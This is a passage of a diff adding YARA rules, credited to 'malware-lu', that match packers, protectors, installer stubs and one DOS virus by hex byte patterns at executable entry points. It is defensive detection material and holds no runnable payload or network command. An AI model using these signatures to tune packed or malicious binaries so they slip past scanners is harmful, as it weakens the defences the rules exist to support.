+strings:
+		$a0 = { 55 8B EC 83 C4 EC 33 C0 89 45 EC B8 54 20 44 44 E8 DF F8 FF FF 33 C0 55 68 08 21 44 44 64 FF 30 64 89 20 8D 55 EC B8 1C 21 44 44 E8 E0 F9 FF FF 8B 55 EC B8 40 ?? ?? 44 E8 8B F5 FF FF 6A 00 6A 00 6A 02 6A 00 6A 01 68 00 00 00 40 A1 40 ?? ?? 44 E8 7E F6 FF FF 50 E8 4C F9 FF FF 6A 00 50 E8 4C F9 FF FF A3 28 ?? ?? 44 E8 CE FE FF FF 33 C0 5A 59 59 64 89 10 68 0F 21 44 44 8D 45 EC E8 F1 F4 FF FF C3 E9 BB F2 FF FF EB F0 E8 FC F3 FF FF FF FF FF FF 0E 00 00 00 63 3A 5C 30 30 30 30 30 30 31 2E 64 61 74 00 }
+	$a1 = { 85 D2 74 23 8B 4A F8 41 7F 1A 50 52 8B 42 FC E8 30 00 00 00 89 C2 58 52 8B 48 FC E8 48 FB FF FF 5A 58 EB 03 FF 42 F8 87 10 85 D2 74 13 8B 4A F8 49 7C 0D FF 4A F8 75 08 8D 42 F8 E8 5C FA FF FF C3 8D 40 00 85 C0 7E 24 50 83 C0 0A 83 E0 FE 50 E8 2F FA FF FF 5A 66 C7 44 02 FE 00 00 83 C0 08 5A 89 50 FC C7 40 F8 01 00 00 00 C3 31 C0 C3 90 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC70DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEShieldV05Smoke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 }
+	$a1 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler25Ap0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 0B 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 6C 3E 40 00 E8 F7 EA FF FF 33 C0 55 68 60 44 40 00 64 FF 30 64 89 20 BA 70 44 40 00 B8 B8 6C 40 00 E8 62 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 A1 EB FF FF BA E8 64 40 00 8B C3 8B 0D B8 6C 40 00 E8 37 D3 FF FF C7 05 BC 6C 40 00 0A 00 00 00 BB 68 6C 40 00 BE 90 6C 40 00 BF E8 64 40 00 B8 C0 6C 40 00 BA 04 00 00 00 E8 07 EC FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 09 F3 FF FF 89 03 83 3B 00 0F 84 BB 04 00 00 B8 C0 6C 40 00 8B 16 E8 06 E2 FF FF B8 C0 6C 40 00 E8 24 E1 FF FF 8B D0 8B 03 8B 0E E8 D1 D2 FF FF 8B C7 A3 20 6E 40 00 8D 55 EC 33 C0 E8 0C D4 FF FF 8B 45 EC B9 1C 6E 40 00 BA 18 6E 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov177
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B0 71 40 00 68 6C 37 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTrivial25
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 4E FE C6 CD 21 B8 ?? 3D BA ?? 00 CD 21 93 B4 40 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov171
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KBySV022shoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 11 55 07 8B EC B8 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 49 6E 6E 6F 53 65 74 75 70 4C 64 72 57 69 6E 64 6F 77 00 00 53 54 41 54 49 43 }
+	$a1 = { 55 8B EC 83 C4 ?? 53 56 57 33 C0 89 45 F0 89 45 ?? 89 45 ?? E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule piritv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 24 55 50 44 FB 32 2E 31 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftSentryv30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 E9 B0 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV22007411WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov19x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov285
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 68 ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv17
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 90 1F 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Splasherv10v30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 8B 44 24 24 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 50 E8 ED 02 ?? ?? 8C C0 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeCryptor01build002GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 90 68 27 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEShieldV06SMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 }
+	$a1 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MicrosoftVisualBasic5060Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118DllLZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 08 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv100v103
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 8C DB 03 D8 3B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkerv34
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D B4 ?? ?? ?? ?? 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 ?? 0B 00 00 83 C4 04 8B 75 08 A3 B4 ?? ?? ?? 85 F6 74 23 83 7D 0C 03 77 1D 68 FF }
+	$a1 = { BB ?? ?? BA ?? ?? 81 C3 07 00 B8 40 B4 B1 04 D3 E8 03 C3 8C D9 49 8E C1 26 03 0E 03 00 2B }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Shrinkerv32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? ?? 55 8B EC 56 57 75 65 68 00 01 ?? ?? E8 ?? E6 FF FF 83 C4 04 8B 75 08 A3 ?? ?? ?? ?? 85 F6 74 1D 68 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkerv33
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01JDPack1xJDProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack024027beta028alphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 B0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01LocklessIntroPackAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov250b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev02v20x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftProtectwwwsoftprotectbyru
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? C7 00 00 00 00 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTPackerV2XErazerZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4B 57 69 6E 64 6F 77 73 00 10 55 54 79 70 65 73 00 00 3F 75 6E 74 4D 61 69 6E 46 75 6E 63 74 69 6F 6E 73 00 00 47 75 6E 74 42 79 70 61 73 73 00 00 B7 61 50 4C 69 62 75 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SiliconRealmsInstallStub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? 92 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 ?? ?? 40 00 33 D2 8A D4 89 15 ?? ?? 40 00 8B C8 81 E1 FF 00 00 00 89 0D ?? ?? 40 00 C1 E1 08 03 CA 89 0D ?? ?? 40 00 C1 E8 10 A3 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov430v440SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? 00 68 80 ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 ?? ?? 00 33 D2 8A D4 89 15 30 ?? ?? 00 8B C8 81 E1 FF 00 00 00 89 0D 2C ?? ?? 00 C1 E1 08 03 CA 89 0D 28 ?? ?? 00 C1 E8 10 A3 24 }
+	$a1 = { 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MoleBoxv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 60 E8 4F }
+
+condition:
+		$a0
+}
+	
+	
+rule FucknJoyv10cUsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00 }
+	$a1 = { 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00 00 0B C0 0F 84 EC 00 00 00 89 85 4D 08 40 00 8D 85 51 08 40 00 50 FF B5 6C 08 40 00 E8 AF 02 00 00 0B C0 0F 84 CC 00 00 00 89 85 5C 08 40 00 8D 85 67 07 40 00 E8 7B 02 00 00 8D B5 C4 07 40 00 56 6A 64 FF 95 74 07 40 00 46 80 3E 00 75 FA C7 06 74 6D 70 2E 83 C6 04 C7 06 65 78 65 00 8D 85 36 07 40 00 E8 4C 02 00 00 33 DB 53 53 6A 02 53 53 68 00 00 00 40 8D 85 C4 07 40 00 50 FF 95 74 07 40 00 89 85 78 07 40 00 8D 85 51 07 40 00 E8 21 02 00 00 6A 00 8D 85 7C 07 40 00 50 68 00 ?? ?? 00 8D 85 F2 09 40 00 50 FF }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02VideoLanClientAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftWrap
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 53 51 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 36 ?? ?? ?? E8 ?? 01 ?? ?? 60 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AI1Creator1Beta2byMZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 FE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule JAMv211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 06 16 07 BE ?? ?? 8B FE B9 ?? ?? FD FA F3 2E A5 FB 06 BD ?? ?? 55 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv0978
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 24 88 40 ?? 87 DD 8B 85 A9 88 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Setup2GoInstallerStub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 53 45 54 55 50 5F 49 4E 46 4F 5D 0D 0A 56 65 72 }
+
+condition:
+		$a0
+}
+	
+	
+rule themida1005httpwwworeanscom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorv1033exescrcomAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ORiENv211DEMO
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5D 01 00 00 CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv0977
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB A0 86 40 ?? 87 DD 8B 85 2A 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv13betaCyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv13bVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7 }
+	$a1 = { 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule mkfpackllydd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 81 EB 05 00 00 00 8B 93 9F 08 00 00 53 6A 40 68 00 10 00 00 52 6A 00 FF 93 32 08 00 00 5B 8B F0 8B BB 9B 08 00 00 03 FB 56 57 E8 86 08 00 00 83 C4 08 8D 93 BB 08 00 00 52 53 FF E6 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESpinV03cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BorlandDelphiSetupModuleAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 90 53 56 57 33 C0 89 45 F0 89 45 D4 89 45 D0 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELOCKnt204
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IMPostorPack10MahdiHezavehi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? 00 83 C6 01 FF E6 00 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? 02 ?? ?? 00 10 00 00 00 02 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PluginToExev102BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 B4 4C CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateexeProtectorV18SetiSoftTeam
+{
+      meta:
+		author="malware-lu"
+strings:
